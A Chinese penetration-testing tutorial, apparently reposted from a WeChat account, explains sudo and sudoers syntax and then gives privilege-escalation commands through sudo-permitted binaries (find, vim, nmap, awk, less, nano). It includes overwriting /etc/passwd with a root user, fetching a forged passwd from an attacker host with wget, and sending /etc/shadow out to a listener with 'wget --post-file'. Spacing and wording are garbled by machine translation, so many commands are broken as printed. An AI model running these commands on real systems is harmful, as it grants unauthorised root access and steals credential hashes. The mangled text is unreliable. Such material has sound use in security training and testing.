在渗透中,我们拿到的webshell和反弹回来的shell权限可能都不高,如果我们可以使用sudo命令访问某些程序,则我们可以使用sudo
可以提权。在这里,我们可以通过调用一些二进制文件,这些文件可以帮助我们使用sudo命令提升特权。但是在特权升级之前,让我们了解一些sudoer文件语法,sudo命令是什么?;)。
什么是SUDO?
Sudoer文件语法。
利用SUDO用户
/usr/bin/find
/usr/bin/nano
/usr/bin/vim
/usr/bin/man
/usr/bin/awk
/usr/bin/less
/usr/bin/nmap ( –interactive and –script method)
/bin/more
/usr/bin/wget
/usr/sbin/apache2
什么是SUDO ??
sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。
基础
它的特性主要有这样几点:
§ sudo能够限制用户只在某台主机上运行某些命令。
§ sudo提供了丰富的日志,详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。
§ sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且输入它的密码时,用户获得了一张存活期为5分钟的票(这个值可以在编译的时候改变)。
§ sudo的配置文件是sudoers文件,它允许系统管理员集中的管理用户的使用权限和使用的主机。它所存放的位置默认是在/etc/sudoers,属性必须为0440。
在sudo于1980年前后被写出之前,一般用户管理系统的方式是利用su切换为超级用户。但是使用su的缺点之一在于必须要先告知超级用户的密码。
sudo使一般用户不需要知道超级用户的密码即可获得权限。首先超级用户将普通用户的名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息,登记在特殊的文件中(通常是/etc/sudoers),即完成对该用户的授权(此时该用户称为“sudoer”);在一般用户需要取得特殊权限时,其可在命令前加上“sudo”,此时sudo将会询问该用户自己的密码(以确认终端机前的是该用户本人),回答后系统即会将该命令的进程以超级用户的权限运行。之后的一段时间内(默认为5分钟,可在/etc/sudoers自定义),使用sudo不需要再次输入密码。
由于不需要超级用户的密码,部分Unix系统甚至利用sudo使一般用户取代超级用户作为管理帐号,例如Ubuntu、Mac OS X等。
参数说明:
-V 显示版本编号
-h 会显示版本编号及指令的使用方式说明
-l 显示出自己(执行 sudo 的使用者)的权限
-v 因为 sudo 在第一次执行时或是在 N 分钟内没有执行(N 预设为五)会问密码,这个参数是重新做一次确认,如果超过 N 分钟,也会问密码
-k 将会强迫使用者在下一次执行 sudo 时问密码(不论有没有超过 N 分钟)
-b 将要执行的指令放在背景执行
-p prompt 可以更改问密码的提示语,其中 %u 会代换为使用者的帐号名称, %h 会显示主机名称
-u username/#uid 不加此参数,代表要以 root 的身份执行指令,而加了此参数,可以以 username 的身份执行指令(#uid 为该 username 的使用者号码)
-s 执行环境变数中的 SHELL 所指定的 shell ,或是 /etc/passwd 里所指定的 shell
-H 将环境变数中的 HOME (家目录)指定为要变更身份的使用者家目录(如不加 -u 参数就是系统管理者 root )
command 要以系统管理者身份(或以 -u 更改为其他人)执行的指令
Sudoer文件
sudoers文件主要有三部分组成:
sudoers的默认配置(default),主要设置sudo的一些缺省值
alias(别名),主要有Host_Alias|Runas_Alias|User_Alias|Cmnd_Alias。
安全策略(规则定义)——重点。
语法
root ALL=(ALL) ALL
说明1:root用户可以从 ALL 终端作为 ALL (任意)用户执行,并运行 ALL (任意)命令。
第一部分是用户,第二部分是用户可以在其中使用sudo
命令的终端,第三部分是他可以充当的用户,最后一部分是他在使用时可以运行的命令。sudo
touhid ALL= /sbin/poweroff
说明2:以上命令,使用户可以从任何终端使用touhid的用户密码关闭命令电源。
touhid ALL = (root) NOPASSWD: /usr/bin/find
说明3:上面的命令,使用户可以从任何终端运行,以root用户身份运行命令find 而无需密码。
利用SUDO用户。
要利用sudo用户,您需要找到您必须允许的命令。sudo -l
上面的命令显示了允许当前用户使用的命令。
此处sudo -l,显示用户已允许以root用户身份执行所有此二进制文件而无需密码。
让我们一一查看所有二进制文件(仅在索引中提到)和将特权提升给root用户。
使用查找命令
sudo find / etc / passwd -exec / bin / sh \;
要么
sudo find / bin -name nano -exec / bin / sh \;
使用Vim命令
sudo vim -c'!sh'
使用Nmap命令
sudo nmap-交互式
nmap>!sh
sh-4.1#
注意:nmap –interactive选项在最新的nmap中不可用。
也可以
echo“ os.execute('/ bin / sh')”> /tmp/shell.nse && sudo nmap --script = / tmp / shell.nse
使用Man命令
sudo man man
之后按!按下并按Enter
使用less/more命令
sudo less / etc / hosts
sudo more / etc / hosts
之后按!按下并按Enter
使用awk命令
sudo awk'BEGIN {system(“ / bin / sh”)}'
使用nano命令
nano是使用此编辑器的文本编辑器,在您需要切换用户之后,您可以修改passwd文件并将用户添加为root特权。在/ etc / passwd中添加此行,以将用户添加为root特权。
touhid:$ 6 $ bxwJfzor $ MUhUWO0MUgdkWfPPEydqgZpm.YtPMI / gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/ root:/ bin
sudo nano / etc / passwd
现在切换用户密码是:test
su touhid
使用wget命令
这种非常酷的方式要求Web服务器下载文件。这样我从没在任何地方见过。让我们解释一下。
在At客者一边。
首先将Target的/ etc / passwd文件复制到攻击者计算机。
修改文件,并在上一步中保存的密码文件中添加用户到攻击者计算机。
仅附加此行=> touhid:$ 6 $ bxwJfzor $ MUhUWO0MUgdkWfPPEydqgZpm.YtPMI / gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0 / 0:b:root / root:
将passwd文件托管到使用任何Web服务器的主机。
在要提权主机方面。
sudo wget http://192.168.56.1:8080/passwd -O / etc / passwd
现在切换用户密码是:test
su touhid
注意:如果您要从服务器上转储文件,例如root的ssh密钥,shadow文件等。
sudo wget --post-file = / etc / shadow 192.168.56.1:8080
攻击者的设置侦听器:nc – lvp 8080
使用apache命令
但是,我们无法获得Shell和Cant编辑系统文件。
但是使用它 我们可以查看系统文件。
sudo apache2 -f / etc / shadow
输出是这样的:
Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration
可悲的是没有shell。但是我们可以现在提取root哈希,然后破解了哈希
渗透测试 红队攻防 免杀 权限维持 等等技术
及时分享最新漏洞复现以及EXP 国内外最新技术分享!!!
进来一起学习吧
本文分享自微信公众号 - 黑白天(li0981jing)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。
来源:oschina
链接:https://my.oschina.net/u/4196756/blog/4642671